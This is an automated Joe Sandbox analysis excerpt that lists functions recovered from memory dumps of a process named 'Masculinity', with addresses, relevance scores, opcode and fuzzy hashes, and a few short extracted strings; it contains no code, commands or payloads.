Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 677f6df9c61add2b0f69ee6396b05bf1b0720de54c4ebe4d4d3bf262cc934342
Instruction ID: d55963841400920bc1da05f1f7adc9966fa873db74ffffab442a15a252098d53
Opcode Fuzzy Hash: 677f6df9c61add2b0f69ee6396b05bf1b0720de54c4ebe4d4d3bf262cc934342
Instruction Fuzzy Hash: 0BB19F30708255CFDB159B28C894B7A7BB2AFC9302F55856AE816CF3A1DB34CC89D791

Function 00156498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,gq, xrefs: 0015656E
,gq, xrefs: 00156578

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: ,gq$,gq
API String ID: 0-2533611571
Opcode ID: 967056a6e8771889de46593e999b4926b48b4caeb7cdabf19e05528f28c72caa
Instruction ID: 40bcf1229bb81cac3695c16c7c8ce95f2c75fe5ff8c9f60b11344cade6d60686
Opcode Fuzzy Hash: 967056a6e8771889de46593e999b4926b48b4caeb7cdabf19e05528f28c72caa
Instruction Fuzzy Hash: 2A819074A00505CFCB18CF69C48496ABBB2BF89312BA58169D825DF365DB31EC49CFE1

Function 00159D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'cq, xrefs: 00159D84
4'cq, xrefs: 00159D6D

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq
API String ID: 0-60795322
Opcode ID: bebdab3d35f4ad4d3f2be2913412d269b4f44e8808aa3894701fc497615eca64
Instruction ID: 173f98e1a1dd921350bddb360e77997ca53c5fd560a5e637e193ade7a9cf2603
Opcode Fuzzy Hash: bebdab3d35f4ad4d3f2be2913412d269b4f44e8808aa3894701fc497615eca64
Instruction Fuzzy Hash: 36F04435300115AFDB091BA9985497BBBABFBC8361B148429BE0AC7391DF61CC4583A1

Function 04A69B94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 04A69CD6

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6311d9fe33a2a19e14bfb286285997f6bd0eeaa5ca2c79ecc97993f7276a95f
Instruction ID: aaa4a3a8949071e4201ca8207f663a2ff1141f72215b8a345d6bf24e40525e22
Opcode Fuzzy Hash: c6311d9fe33a2a19e14bfb286285997f6bd0eeaa5ca2c79ecc97993f7276a95f
Instruction Fuzzy Hash: FE1181F4E001098FDB04EFA8D884AAEBBF9FB88304F54C165E815E7245E730AC41CB55

Function 00152790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

F, xrefs: 001527BF

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-2730988801
Opcode ID: ceef58aa44787a727869aca1aaa5bec953b68b04f05a5dca3af6215856ff2abe
Instruction ID: 1597ad08a0105d0f796c5cb5d17e962b57d56566a1e96f3cba85b017ed3e0c3f
Opcode Fuzzy Hash: ceef58aa44787a727869aca1aaa5bec953b68b04f05a5dca3af6215856ff2abe
Instruction Fuzzy Hash: 4E315A75D093498FCB01DFB9D9046EEBFF4EF4A300F1001AAD854AB221EB341988CBA1

Function 0015E2A8 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbd65b41ead39d9d6480d7b8b5d0c71d86e42232835acb4a1d06eccf9971f78
Instruction ID: 0678386479b0f65fde3144e7b5786e290dca1f24df63e48f7ba6731c9f20bd8e
Opcode Fuzzy Hash: 0dbd65b41ead39d9d6480d7b8b5d0c71d86e42232835acb4a1d06eccf9971f78
Instruction Fuzzy Hash: 481299350656468FE2542B70EDAC12BBBF5FB0F32B7546CA8F10FC58659B3045CACA62

Function 001580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564b4fd21e5be6507d661b1b6ac9504a6b6f827ea97002d979e8aab0f4583ba5
Instruction ID: b8935febac1a62984bd0e374a0dce3e7944c3a89d07cfe522e4b3ae6d7200d05
Opcode Fuzzy Hash: 564b4fd21e5be6507d661b1b6ac9504a6b6f827ea97002d979e8aab0f4583ba5
Instruction Fuzzy Hash: 8D71F534700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC86CB50

Function 04DFD0C0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b78042bad31d65bd806e7350ffd21b5013d9b01d246c831f5a4c35f8439348c
Instruction ID: fdb5bb4204b81e8e03197a001cdf547faac850be233421d0ddd9605d68e594f1
Opcode Fuzzy Hash: 1b78042bad31d65bd806e7350ffd21b5013d9b01d246c831f5a4c35f8439348c
Instruction Fuzzy Hash: 1681AE74E412688FDB65DF69DD50BDEBBB2AB89300F1080EAD91DA7254DB306E81CF40

Function 04E01CF0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6aa6a60b24508b53b5c50d599c58e2a1b81a79aa9c9420aba053fd725d6d2e2
Instruction ID: 2c7fddff64c060da2020d173dbc48d5a43cfbb0e0210b11fc50dda7e5a428cc1
Opcode Fuzzy Hash: c6aa6a60b24508b53b5c50d599c58e2a1b81a79aa9c9420aba053fd725d6d2e2
Instruction Fuzzy Hash: 8D71E575E00209CFDB14DFA9C990ADEBBB2FF88300F249129D815AB394DB356982CF50

Function 04E07D20 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7497cb97915a3faedb2cd295811d88ed382cabb4172089e0feec9ddb1555ff17
Instruction ID: 69efd4f95ad6cddf8820fa27773868b987800104bb746d64275a754b9e1628d1
Opcode Fuzzy Hash: 7497cb97915a3faedb2cd295811d88ed382cabb4172089e0feec9ddb1555ff17
Instruction Fuzzy Hash: 6171C375E00209CFDB14DFA9C980ADEBBB2FF88300F249129D815AB395DB356982CF50

Function 04DFCDD0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304af37dba5a006fe5fdf0b3e07e952808feb2ddef89dfd4a51917364caa6c00
Instruction ID: af43dd5c8710f3891af1c4040cf63e1af9fe616a94f8c7ed74bad2fa207c09a5
Opcode Fuzzy Hash: 304af37dba5a006fe5fdf0b3e07e952808feb2ddef89dfd4a51917364caa6c00
Instruction Fuzzy Hash: 0471C275E00219CFDB14DFA9C994ADEBBB2FF88300F248529D815AB364DB356992CF50

Function 04DF6DA0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd468e0a5f2ef903ff202d6fb3196e1c02d282048adde490aa399af50e17c68
Instruction ID: b7164c2a785f1677b1b24e94af97ae1d2e743f3cf0132a9d5689fcde5c11774c
Opcode Fuzzy Hash: 9dd468e0a5f2ef903ff202d6fb3196e1c02d282048adde490aa399af50e17c68
Instruction Fuzzy Hash: 2171C375E00219CFDB14DFA9C990ADEBBB2FF88300F24852AD815AB354DB35A946CF50

Function 04DFE7FB Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060f8a5c39967ced44ad6bc4ebb883ace18a5c26f2a8de3d5a7c551b05165937
Instruction ID: 9ea39c2e85dcdd7cf8dca598bfd641328de3d2e9dca4749a16bb92229b00dd51
Opcode Fuzzy Hash: 060f8a5c39967ced44ad6bc4ebb883ace18a5c26f2a8de3d5a7c551b05165937
Instruction Fuzzy Hash: 1A71B174E006289FEB64DF69DC54BD9BBB2BB89300F5081A9E51DA7260DB315E85CF40

Function 0015F5AF Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5e17cdf1a406fffff868ede18ef09139b27815e941c05ab8bc03b65a6c2de5
Instruction ID: 0f562c970eee598be57820f9c035800ac1c923cf9be453fc5f709c58c3727ebb
Opcode Fuzzy Hash: 6f5e17cdf1a406fffff868ede18ef09139b27815e941c05ab8bc03b65a6c2de5
Instruction Fuzzy Hash: 8F612674D01219CFDB15CFA5C944AEEBBB2FF89305F208129E815AB3A4DB795946CF40

Function 04E859E9 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b192b970e91f2f21d1419175585b85fec7227a56ac1b78e8a321da608e2958
Instruction ID: 4dac5919cc0cef1003bde70b8c9f13068c932bd387019039106b842a75332b3e
Opcode Fuzzy Hash: f2b192b970e91f2f21d1419175585b85fec7227a56ac1b78e8a321da608e2958
Instruction Fuzzy Hash: 2B51B472A012159FCF18AF78C8D41AE7BB2AFC8304B5594AED44EDB351EE359C42CB91

Function 0015D869 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167b96382b688d6a6a6d143212d5f24c90a0ef490de3fb303b32fcfcb4e06011
Instruction ID: 9b83439f3f1da6f4e8c1647dfad0ee9dd8dfacb176aa8d09423c2b5aa5e153f5
Opcode Fuzzy Hash: 167b96382b688d6a6a6d143212d5f24c90a0ef490de3fb303b32fcfcb4e06011
Instruction Fuzzy Hash: AC519174E012189FDB58DFA9D98499DBBF2BF89300F208169E819AB365DB30A905CF50

Function 0015A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb389d2c045a754acddfd0429aab56556f0762dbd63d42384d0a1dc5a77ec66
Instruction ID: 3cd698ec59c79ddfa988c2dd0580679da1b704c01ecfb667720fa457ed754e0f
Opcode Fuzzy Hash: 6cb389d2c045a754acddfd0429aab56556f0762dbd63d42384d0a1dc5a77ec66
Instruction Fuzzy Hash: D141EF31A44249CFCF11CFA8C854AADBFB2BF49315F048255E9659F2A1D370ED58CB62

Function 04DFF4F7 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503577cea80ae9245424e138ada8fa9762b52bba67ef241be2b2d79f808b448d
Instruction ID: 473c5cf79e9672200917fba895b1f51909af672e04cc226a9c9ba853ee90b735
Opcode Fuzzy Hash: 503577cea80ae9245424e138ada8fa9762b52bba67ef241be2b2d79f808b448d
Instruction Fuzzy Hash: 7841D2B4E00209CFCB14CFA8D9487EEBBF1BB48300F14852AD815A73A4EB746946CF55

Function 04DFF508 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a744fdb6428c7100d1c98e50f01e8aa023b28f8113717dfc17f552452d6d47
Instruction ID: 7db572a5e5a7c840e7a42cd09d8d580f269e9c1f041d2ccc4f04843491a58e72
Opcode Fuzzy Hash: f4a744fdb6428c7100d1c98e50f01e8aa023b28f8113717dfc17f552452d6d47
Instruction Fuzzy Hash: CA41C074E00208CFDB14CFA9C9447DEBBF2BF48300F10952AD819A72A4EB386946CF54

Function 00159C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff65e276cb401f06ee30074e342958816c35c02fbab0c561dff0fe4b26672e8
Instruction ID: da7dabafd9311ef2edc8c2fa46b23ee36764fafd2cfd2b7a72ac429e3f6ec3dc
Opcode Fuzzy Hash: 9ff65e276cb401f06ee30074e342958816c35c02fbab0c561dff0fe4b26672e8
Instruction Fuzzy Hash: CE417A30600244CFDB01CFA8C844B6ABBB6EF89312F548466E928CF265E771DC45CBA2

Function 04DFDF48 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e503f829cd0696161037b042381c2ff9cc7d84899d76187668e803b60a4b6d1b
Instruction ID: 2619c1e9c63dd1e17c4045ada1ab4ce1ea720a9fc767cacc8d2d66d53f637925
Opcode Fuzzy Hash: e503f829cd0696161037b042381c2ff9cc7d84899d76187668e803b60a4b6d1b
Instruction Fuzzy Hash: 5C314571B041D29FCB3987289C90D6E7B73BF813103060A67EA56DB5B1DB24AD41C792

Function 04E07F99 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267415a00c531746c4bbade404e846d634b2e55a00132e37a349918761722f5f
Instruction ID: 5b746f812864bc8703da8349c14b51d5bd13ec55f4f4ca600a88d6341d43cf08
Opcode Fuzzy Hash: 267415a00c531746c4bbade404e846d634b2e55a00132e37a349918761722f5f
Instruction Fuzzy Hash: 5331D675E01648CFEB18DFAAD9506DEBBB2BF89300F14D12AC819BB294DB345946CF50

Function 04DF6D90 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704c2fedb6d9eb30c2d00d40a44b37a07c045ba10de2d3ce3c860eb0d28fce88
Instruction ID: 54e2f4882628b2e965269652dc0e356861ced5d3c17819a0d67908b8f49abae6
Opcode Fuzzy Hash: 704c2fedb6d9eb30c2d00d40a44b37a07c045ba10de2d3ce3c860eb0d28fce88
Instruction Fuzzy Hash: D7312A74E012488FDB18DFAAC9446DEBBF2AFC9300F14C02AD418BB255EB34A906CF55

Function 00155658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aef81877ffcda065f07cedd55d5c217e1f33aab54cf6f54508723c14491365
Instruction ID: a23a12bd6e8cee7c1b1f3e68e6713c36ccb08b410ad47a780859f630f98fd635
Opcode Fuzzy Hash: 26aef81877ffcda065f07cedd55d5c217e1f33aab54cf6f54508723c14491365
Instruction Fuzzy Hash: C731CE31204149DFCF059F64D9A9AAF3BB3EB88301F508424FD299B255CB35CEA5DBA0

Function 04DFCDC1 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8e6783bf3e34695b79d18ca0b39e7637feff9dcf06c3d3b348d737a709c504
Instruction ID: f03850512102999147b9ddca8263dd83bbe1d3725f46c931d340d7cf75832567
Opcode Fuzzy Hash: 2d8e6783bf3e34695b79d18ca0b39e7637feff9dcf06c3d3b348d737a709c504
Instruction Fuzzy Hash: 8D3109B5E002088BDB14DFAAD9406DEBBF2BFC9300F248029D519BB254EB346946CF51

Function 04DF6A6F Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b113d92e9e2a73b74f060ae6a9b45c9dadf866d4b1f631be68d548ddb33fc65
Instruction ID: c7d15a36c0b5a32b9267c87f860c5455e59eb0e2e6b7c08f4ab202966376cf8d
Opcode Fuzzy Hash: 0b113d92e9e2a73b74f060ae6a9b45c9dadf866d4b1f631be68d548ddb33fc65
Instruction Fuzzy Hash: 9C310674E00218CBEB18DFAAD9406DEBBB2BF89304F14D12AD419BB254EB749946CF50

Function 04E01CDF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d65fa8d2098724682089fd5cd5673babaafebe8755a10c39876594fc843c27
Instruction ID: 8505ebf0f31c8d23741451c22522065557dba8c2e9afbf7edfab1140c6387ff8
Opcode Fuzzy Hash: 37d65fa8d2098724682089fd5cd5673babaafebe8755a10c39876594fc843c27
Instruction Fuzzy Hash: 0E3109B5E002088BDB18DFAAD9446DDFBF3AF89301F24D529D429BB258EB355942CF50

Function 04E0F980 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac0ed6655c39e3e0573678a2f10715b1df3ccc2d8f3a6779531ae7e26ee781c
Instruction ID: cd448cc08e5e269771bfa1f67e78abfc45dd72572ef7aabc8624283208fbca2c
Opcode Fuzzy Hash: 5ac0ed6655c39e3e0573678a2f10715b1df3ccc2d8f3a6779531ae7e26ee781c
Instruction Fuzzy Hash: F2310474E002088FEB18DFAAD9406DEBBB2AF88300F10D12AD819BB254EB745946CF50

Function 00158370 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6ee77e0f7a95af860a7baff3710ab6d37b3004e091c5782b375726afc22035
Instruction ID: ec2b15283b1ba114678cc73acdd13f419368f678e7406ad2dcb479c3ca545817
Opcode Fuzzy Hash: 8a6ee77e0f7a95af860a7baff3710ab6d37b3004e091c5782b375726afc22035
Instruction Fuzzy Hash: 8121F431304242CBCB1617398858B7E36A6AFC570A715403ADC16DF6A5EF25CC8BD752

Function 001541A0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f00dbecd8c31b316181dc577a625ca746f17de1f1a49bda7dd034cc01b68f8
Instruction ID: 3936dd3ff4948483945c77c4e2adf06607011ab360c03d2a7ed27209d7b16538
Opcode Fuzzy Hash: 91f00dbecd8c31b316181dc577a625ca746f17de1f1a49bda7dd034cc01b68f8
Instruction Fuzzy Hash: 95418075E01608CFCB48DFAAD98499DBBF2BF89301F249129E815BB364DB34A945CF14

Function 04E07D22 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891770d368ddb903338414fdc38848d721256ee825adb1845af37ac591877e50
Instruction ID: 0ea42e25e8a8798a153db408a01e7edb05cd19bd6db190fe17a962484e39c9a3
Opcode Fuzzy Hash: 891770d368ddb903338414fdc38848d721256ee825adb1845af37ac591877e50
Instruction Fuzzy Hash: F931C874E012088FDB18DFAAC5446DEFBF2AF89304F24D42AD419BB254EB346946CF54

Function 00158380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36129dc9fd6360e821d55e6d863c5e9b42c64696e6d53ae7f9f56257eb0a623a
Instruction ID: 47ae60c8b31ca9dd4ec9ab5c2c15153703b0761b03a195302db0ff4f5f066ec6
Opcode Fuzzy Hash: 36129dc9fd6360e821d55e6d863c5e9b42c64696e6d53ae7f9f56257eb0a623a
Instruction Fuzzy Hash: 6A21AF31300202CBDB155A29C858B3F2697AFC474AF248039DC16DF7A9EF65CC8B9392

Function 04E83E98 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c52fe0d79bb3663216525fd33b78669d53f13c28ed5c90ca2c7861c8e23a7a5
Instruction ID: 8d26a164769f6a28f5e4f50889699391467b844dd920b36a8b46dbe9eda28b96
Opcode Fuzzy Hash: 0c52fe0d79bb3663216525fd33b78669d53f13c28ed5c90ca2c7861c8e23a7a5
Instruction Fuzzy Hash: C0116763266E178FE2152770DCAC63B3962FB47307F402E1AA20B725A14F3819098D67

Function 04E858E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f95f33ab8df9833df959fd10ca8ef164c376de81e336bd91ab67e50fc70adc
Instruction ID: 89312ecb7834f6da77fc473e0adc76e1fef4a10ec1760b7ea9c60fcd29686b60
Opcode Fuzzy Hash: c5f95f33ab8df9833df959fd10ca8ef164c376de81e336bd91ab67e50fc70adc
Instruction Fuzzy Hash: 99212B30A00118ABDF14EBB8D854AEEBAB6AF88320F505429D519B7294DF346D95CB61

Function 001528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c301fdcbe7c8b15a55de19143ce29e296895b075777cc4f305a2c2add50842ab
Instruction ID: dfb579a4b3a5839fefe0c1ab73f3ed4f1b95665f5ad8858c25b7ce0c80cdc80e
Opcode Fuzzy Hash: c301fdcbe7c8b15a55de19143ce29e296895b075777cc4f305a2c2add50842ab
Instruction Fuzzy Hash: 59218136A00116DFCB14DF24D4409AE77B5EB9E364F60C419D81A9B398EB30EE46CBD1

Function 0009D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271377387.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9d000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c9484b129b32b4c108829c4ec359077f844cf1a356a149396793726cfbfc5d8
Instruction ID: 0abd2435472032c1870b240d54bb2b59d0b440ab4a11ac0bc3003d896f528dca
Opcode Fuzzy Hash: 8c9484b129b32b4c108829c4ec359077f844cf1a356a149396793726cfbfc5d8
Instruction Fuzzy Hash: 6721F5B1544240EFDF15DF14D9C0B2ABFA5FB98318F24C56AE9090B246C336D856EBA2

Function 00156300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f87f229abc3e63b7048ba7ac99836b81563c311c011b26898120895f275f5b5
Instruction ID: 694d62b250024514992856b6ea33812ba786c0e41f287811ee26d0491ba9e17e
Opcode Fuzzy Hash: 6f87f229abc3e63b7048ba7ac99836b81563c311c011b26898120895f275f5b5
Instruction Fuzzy Hash: 4221DE35300611CBC7199B29C858A2EB3A2FF897567558428EC1ECB7A4CF30DC068BD0

